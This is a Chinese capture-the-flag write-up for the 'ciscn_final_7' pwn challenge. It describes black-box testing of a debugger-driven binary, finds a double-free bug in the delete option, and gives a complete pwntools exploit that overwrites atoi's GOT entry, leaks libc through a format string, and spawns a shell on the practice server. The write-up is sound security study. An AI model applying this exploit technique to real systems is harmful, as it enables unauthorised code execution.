ciscn_final_7(黑盒测试)

首先检查一下程序的保护机制

然后，我们用IDA分析一下

程序比较复杂

比较难逆向，其大致原理是fork了子进程做为一个调试进程，然后主进程里通过int 3中断通知调试器设置相应的寄存器，从而执行到其他地方。

由于整个程序主逻辑全部使用中断来实现，比较难逆向，因此我们直接黑盒测试了。

首先通过枚举choice的选项，得到了一下选项

#110 add
#120 edit
#238 del
#386 exit

然后就进行测试，发现del功能存在UAF，可以多次del，因此，这题就比较简单了。

#coding:utf8
from pwn import *

#sh = process('./ciscn_final_7',env={'LD_PRELOAD':'./libc-2.27.so'})
sh = remote('node3.buuoj.cn',27363)
libc = ELF('./libc-2.27.so')
elf = ELF('./ciscn_final_7')
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
#110 add
#120 edit
#238 del
#386 exit

def add(size,content):
   sh.sendlineafter('command>>','110')
   sh.sendlineafter('string:',str(size))
   sh.sendlineafter('string:',content)

def add_s(size,content):
   sh.sendlineafter('command>>','%110c')
   sh.sendlineafter('string:','%' + str(size) + 'c')
   sh.sendlineafter('string:',content)

def edit(size,new_content):
   sh.sendlineafter('command>>','120')
   sh.sendlineafter('string:',str(size))
   sh.sendlineafter('string:',new_content)

def delete(index):
   sh.sendlineafter('command>>','238')
   sh.sendlineafter('string:',str(index))

add(0x20,'a'*0x20) #0
#double free
delete(0)
delete(0)

add(0x30,'b'*0x30) #1
delete(1)
delete(1)



add(0x20,p64(atoi_got)) #2
add(0x20,'c') #3
add(0x20,p64(printf_plt)) #4，修改atoi的got表为printf的plt
sh.sendlineafter('command>>','%25$p')
sh.recvuntil('0x')
#泄露地址
libc_base = int(sh.recvuntil('invalid choice',drop = True),16) - 0xE7 - libc.sym['__libc_start_main']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)

add_s(0x30,p64(atoi_got)) #5
add_s(0x30,'d') #6
add_s(0x30,p64(system_addr)) #7 修改atoi的got表为system
#getshell
sh.sendlineafter('command>>','/bin/sh')

sh.interactive()